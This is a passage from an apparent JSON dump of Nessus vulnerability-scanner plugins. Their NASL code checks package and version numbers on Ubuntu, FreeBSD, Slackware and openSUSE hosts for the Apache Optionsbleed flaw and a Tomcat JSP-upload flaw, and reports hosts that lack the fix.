value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2023 Canonical, Inc. / NASL script (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('14.04' >< os_release || '16.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04 / 16.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '14.04', 'pkgname': 'apache2', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-bin', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-data', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-dev', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-mpm-event', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-mpm-itk', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-mpm-prefork', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-mpm-worker', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-suexec', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-suexec-custom', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-suexec-pristine', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-utils', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2.2-bin', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'libapache2-mod-macro', 'pkgver': '1:2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'libapache2-mod-proxy-html', 'pkgver': '1:2.4.7-1ubuntu4.18'},\n {'osver': '16.04', 'pkgname': 'apache2', 'pkgver': '2.4.18-2ubuntu3.5'},\n {'osver': '16.04', 'pkgname': 'apache2-bin', 'pkgver': '2.4.18-2ubuntu3.5'},\n {'osver': '16.04', 'pkgname': 'apache2-data', 'pkgver': '2.4.18-2ubuntu3.5'},\n {'osver': '16.04', 'pkgname': 'apache2-dev', 'pkgver': '2.4.18-2ubuntu3.5'},\n {'osver': '16.04', 'pkgname': 'apache2-suexec-custom', 'pkgver': '2.4.18-2ubuntu3.5'},\n {'osver': '16.04', 'pkgname': 'apache2-suexec-pristine', 'pkgver': '2.4.18-2ubuntu3.5'},\n {'osver': '16.04', 'pkgname': 'apache2-utils', 'pkgver': '2.4.18-2ubuntu3.5'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'apache2 / apache2-bin / apache2-data / apache2-dev / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:02:39", "description": "According to its banner, the version of Apache running on the remote host is 2.4.x prior to 2.4.28. It is, therefore, affected by an HTTP vulnerability related to the <Limit {method}> directive in an .htaccess file.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-10-13T00:00:00", "type": "nessus", "title": "Apache 2.4.x < 2.4.28 HTTP Vulnerability (OptionsBleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:http_server", "cpe:/a:apache:httpd"], "id": "APACHE_2_4_28.NASL", "href": "https://www.tenable.com/plugins/nessus/103838", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103838);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_bugtraq_id(100872);\n\n script_name(english:\"Apache 2.4.x < 2.4.28 HTTP Vulnerability (OptionsBleed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apache running on the remote\nhost is 2.4.x prior to 2.4.28. It is, therefore, affected by an HTTP\nvulnerability related to the <Limit {method}> directive in an \n.htaccess file.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://archive.apache.org/dist/httpd/CHANGES_2.4.28\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.4.28 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9798\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:httpd\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\", \"apache_http_server_nix_installed.nbin\", \"apache_httpd_win_installed.nbin\");\n script_require_keys(\"installed_sw/Apache\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\n\napp_info = vcf::apache_http_server::combined_get_app_info(app:'Apache');\n\nconstraints = [\n { \"min_version\" : \"2.4\", \"fixed_version\" : \"2.4.28\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:01:36", "description": "The version of Apache Tomcat installed on the remote host is 7.0.x prior to 7.0.82. It is, therefore, affected by an unspecified vulnerability when running on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialization parameter of the Default to false) makes it possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.\n\nNote that Nessus has not attempted to exploit this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-10-11T00:00:00", "type": "nessus", "title": "Apache Tomcat 7.0.x < 7.0.82 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12617"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_7_0_82.NASL", "href": "https://www.tenable.com/plugins/nessus/103782", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103782);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2017-12617\");\n script_bugtraq_id(100954);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Apache Tomcat 7.0.x < 7.0.82 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 7.0.x\nprior to 7.0.82. It is, therefore, affected by an unspecified\nvulnerability when running on Windows with HTTP PUTs enabled (e.g. via\nsetting the readonly initialization parameter of the Default to false)\nmakes it possible to upload a JSP file to the server via a specially\ncrafted request. This JSP could then be requested and any code it\ncontained would be executed by the server.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application's self-reported version number.\");\n # http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.82\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bbdfd5cb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 7.0.82 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12617\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\ntomcat_check_version(fixed:\"7.0.82\", min:\"7.0\", severity:SECURITY_WARNING, granularity_regex:\"^7(\\.0)?$\");\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:10:50", "description": "The Fuzzing Project reports :\n\nApache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.", "cvss3": {}, "published": "2017-09-20T00:00:00", "type": "nessus", "title": "FreeBSD : Apache -- HTTP OPTIONS method can leak server memory (76b085e2-9d33-11e7-9260-000c292ee6b8) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache22", "p-cpe:/a:freebsd:freebsd:apache24", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_76B085E29D3311E79260000C292EE6B8.NASL", "href": "https://www.tenable.com/plugins/nessus/103344", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103344);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"FreeBSD : Apache -- HTTP OPTIONS method can leak server memory (76b085e2-9d33-11e7-9260-000c292ee6b8) (Optionsbleed)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Fuzzing Project reports :\n\nApache httpd allows remote attackers to read secret data from process\nmemory if the Limit directive can be set in a user's .htaccess file,\nor if httpd.conf has certain misconfigurations, aka Optionsbleed. This\naffects the Apache HTTP Server through 2.2.34 and 2.4.x through\n2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request\nwhen attempting to read secret data. This is a use-after-free issue\nand thus secret data is not always sent, and the specific data depends\non many factors including configuration. Exploitation with .htaccess\ncan be blocked with a patch to the ap_limit_section function in\nserver/core.c.\"\n );\n # https://vuxml.freebsd.org/freebsd/76b085e2-9d33-11e7-9260-000c292ee6b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5a9655b5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache24\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache24<2.4.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache22<2.2.34_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:00:56", "description": "New httpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, 14.2, and -current to fix a security issue.", "cvss3": {}, "published": "2017-09-19T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : httpd (SSA:2017-261-01) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:httpd", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2017-261-01.NASL", "href": "https://www.tenable.com/plugins/nessus/103306", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-261-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103306);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"SSA\", value:\"2017-261-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : httpd (SSA:2017-261-01) (Optionsbleed)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New httpd packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, 14.2, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.551634\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bf69bb8a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"i486\", pkgnum:\"2_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"i486\", pkgnum:\"2_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"i486\", pkgnum:\"2_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"i486\", pkgnum:\"2_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"i486\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"i586\", pkgnum:\"2_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"i586\", pkgnum:\"3\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"x86_64\", pkgnum:\"3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:01:22", "description": "This update for apache2 fixes the following security issue :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that allowed for an information leak via OPTIONS (bsc#1058058).\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {}, "published": "2017-09-22T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-2017-1083) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-debugsource", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-event", "p-cpe:/a:novell:opensuse:apache2-event-debuginfo", "p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-utils-debuginfo", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-worker-debuginfo", "cpe:/o:novell:opensuse:42.2", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2017-1083.NASL", "href": "https://www.tenable.com/plugins/nessus/103399", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1083.\n#\n# The text description of this plugin is (C) SUSE 